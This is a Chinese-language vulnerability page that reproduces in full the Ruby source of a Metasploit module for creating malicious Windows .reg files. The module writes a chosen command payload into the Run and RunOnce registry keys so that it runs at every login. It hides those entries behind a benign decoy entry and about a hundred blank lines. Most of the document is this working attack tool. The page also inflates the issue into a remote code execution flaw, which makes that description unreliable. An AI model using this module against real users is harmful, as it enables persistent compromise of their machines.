Windows Registration Entries (reg) File Vulnerability

漏洞信息

漏洞名称: Windows Registration Entries (.reg) File Vulnerability

漏洞类型: 命令执行

漏洞等级: 高危

漏洞描述: 该漏洞利用Windows注册表条目(.reg)文件,通过添加特定的恶意负载到Windows注册表中,实现命令执行。当用户登录Windows时,负载会自动运行。如果用户在打开文件时拥有提升的权限,负载将在任何用户登录时运行。用户打开文件时会收到确认注册表更改的警告提示。

受影响产品: Windows操作系统,特别是Microsoft Windows 2000及更新版本。Windows是全球广泛使用的操作系统,部署在个人电脑、企业服务器等多种场景中。

漏洞解释: 此漏洞属于命令执行类型,技术根源在于Windows注册表处理.reg文件时的安全机制不足,允许恶意负载通过注册表自动运行。攻击者可以构造特定的.reg文件,诱导用户打开,从而在用户登录时自动执行恶意命令。

影响分析: 此漏洞可能导致远程代码执行,攻击者可以利用此漏洞在受害者机器上执行任意命令,可能导致数据泄露、服务中断等严重后果。漏洞利用需要用户交互(打开恶意.reg文件),但一旦执行,攻击者可以控制受影响的系统。由于Windows的广泛使用,此漏洞的影响范围较大,特别是对于不熟悉安全风险的用户。

产品厂商: Microsoft

产品名称: Windows

影响版本: Microsoft Windows 2000 or newer

来源: https://github.com/rapid7/metasploit-framework/blob/c5ec45452aec6abfd289c3de26d628ed3374712c/modules%2Fexploits%2Fwindows%2Ffileformat%2Fwindows_registration_entries.rb

类型: rapid7/metasploit-framework:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Malicious Windows Registration Entries (.reg) File',
        'Description' => %q{
          This module creates a Windows Registration Entries (.reg) file which
          adds the specified payload to the Windows Registry. The payload runs
          upon Windows login for the current user. If the user has elevated
          privileges when opening the file, the payload will run upon login
          when any user logs in.

          The user will receive a warning prompt to confirm Registry changes
          when opening the file.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'bcoles'
        ],
        'References' => [
          ['URL', 'https://support.microsoft.com/en-us/topic/how-to-add-modify-or-delete-registry-subkeys-and-values-by-using-a-reg-file-9c7f37cf-a5e9-e1cd-c4fa-2a26218a1a23'],
          ['URL', 'https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys'],
          ['URL', 'https://learn.microsoft.com/en-us/windows-hardware/drivers/install/runonce-registry-key'],
          ['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE],
          ['ATT&CK', Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER],
        ],
        'Arch' => [ARCH_CMD],
        'Platform' => 'win',
        'Payload' => {
          'Space' => 244, # 255 minus "cmd.exe /c " prefix length
          'BadChars' => "\x00",
          'DisableNops' => true
        },
        'Targets' => [
          [
            'Microsoft Windows 2000 or newer',
            {
              'RegistryEditorVersion' => '5.00'
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '1995-08-24',
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'DisablePayloadHandler' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
          'SideEffects' => [SCREEN_EFFECTS]
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [true, 'The registration entries file name.', 'msf.reg']),
      ]
    )

    register_advanced_options([
      OptBool.new('AddToCurrentUserWindowsCurrentVersionRun', [false, 'Add payload to login for current user.', true]),
      OptBool.new('AddToCurrentUserWindowsCurrentVersionRunOnce', [false, 'Same as AddToCurrentUserWindowsCurrentVersionRun, but the registry key is deleted after use.', false]),
      OptBool.new('AddToLocalMachineWindowsCurrentVersionRun', [false, 'Add payload to login for all users. The user will see a vague error message if they do not have the necessary permissions, but all other entries are still added successfully.', true]),
      OptBool.new('AddToLocalMachineWindowsCurrentVersionRunOnce', [false, 'Same as AddToLocalMachineWindowsCurrentVersionRun, but the registry key is deleted after use.', false]),
      OptBool.new('PrependBenignEntry', [false, 'Prepend a benign registry entry at the start of the file.', true]),
      OptInt.new('PrependNewLines', [false, 'Prepend new lines before the first malicious registry entry.', 100]),
    ])
  end

  # Create a registry entry in Windows .reg file format
  def registry_entry(path, type, key, value)
    # https://learn.microsoft.com/en-us/windows/win32/sysinfo/registry-element-size-limits
    raise "Registry key '#{type}' length (#{key.length}) is too long (max 255)" if key.length > 255
    raise "Registry value '#{value}' length (#{value.length}) is too long (max 16,300)" if value.length > 16_300

    # https://learn.microsoft.com/en-us/windows/win32/sysinfo/registry-value-types
    raise "Unsupported key type '#{type}', excepted REG_SZ" unless type == 'REG_SZ'

    escaped_value = value.gsub('\\', '\\\\\\').gsub('"', '\\\"')
    reg_entry = "[#{path}]\r\n"
    reg_entry << "\"#{key}\"=\"#{escaped_value}\"\r\n"
    vprint_status("Created registry entry:\n#{reg_entry}")
    reg_entry
  end

  # Format commands for use with the appropriate interpreter
  def format_commands(command_string)
    # Strip preceding whitespace as this would prevent execution
    raw_cmd = command_string.to_s.gsub(/^\s*/, '')

    # If the payload contains " & " we presume it is a command string.
    #
    # TODO: Change this once Metasploit is able to inform a module that
    #       the specified ARCH_CMD payload is a string of commands
    #       (not a single command).
    if raw_cmd.include?(' & ')
      cmd = "cmd.exe /c #{raw_cmd}"
    else
      cmd = raw_cmd
    end

    raise "Command length (#{cmd.length}) is too long (max 255)" if cmd.length > 255

    cmd
  end

  def exploit
    # File structure:
    #   File header string
    #   Benign registry entry (optional)
    #   Visual whitespace padding (optional)
    #   HKCU entries
    #   HKLM entries (optional)
    reg = "Windows Registry Editor Version #{target['RegistryEditorVersion']}\r\n"
    reg << "\r\n"

    reg_entries = []

    if datastore['PrependBenignEntry']
      path = "HKEY_CURRENT_USER\\Software\\#{rand_text_alphanumeric(10..16)}"
      key = rand_text_alphanumeric(10..16)
      reg << registry_entry(
        path,
        'REG_SZ',
        key,
        rand_text_alphanumeric(10..16)
      )
      reg_entries << path + '\\' + key
    end

    reg << "\r\n" * datastore['PrependNewLines']

    if datastore['AddToCurrentUserWindowsCurrentVersionRun']
      path = 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run'
      key = rand_text_alphanumeric(10..16)
      reg << registry_entry(
        path,
        'REG_SZ',
        key,
        format_commands(payload.encoded)
      )
      reg_entries << path + '\\' + key
    end

    if datastore['AddToCurrentUserWindowsCurrentVersionRunOnce']
      path = 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce'
      key = rand_text_alphanumeric(10..16)
      reg << registry_entry(
        path,
        'REG_SZ',
        key,
        format_commands(payload.encoded)
      )
      reg_entries << path + '\\' + key
    end

    if datastore['AddToLocalMachineWindowsCurrentVersionRun']
      path = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
      key = rand_text_alphanumeric(10..16)
      reg << registry_entry(
        path,
        'REG_SZ',
        key,
        format_commands(payload.encoded)
      )
      reg_entries << path + '\\' + key
    end

    if datastore['AddToLocalMachineWindowsCurrentVersionRunOnce']
      path = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
      key = rand_text_alphanumeric(10..16)
      reg << registry_entry(
        path,
        'REG_SZ',
        key,
        format_commands(payload.encoded)
      )
      reg_entries << path + '\\' + key
    end

    unless reg_entries
      fail_with(Failure::BadConfig, 'No registry entries were created! Check module advanced options.')
    end

    file_create(reg)

    print_status("This file will create the following registry keys:\n#{reg_entries.join("\n")}")
  rescue StandardError => e
    print_error(e.message)
  end
end


Github Poc
#rapid7/metasploit-framework:github issues #命令执行
Windows Registration Entries (reg) File Vulnerability
http://example.com/2025/07/15/github_1865017343/
作者
lianccc
发布于
2025年7月15日
许可协议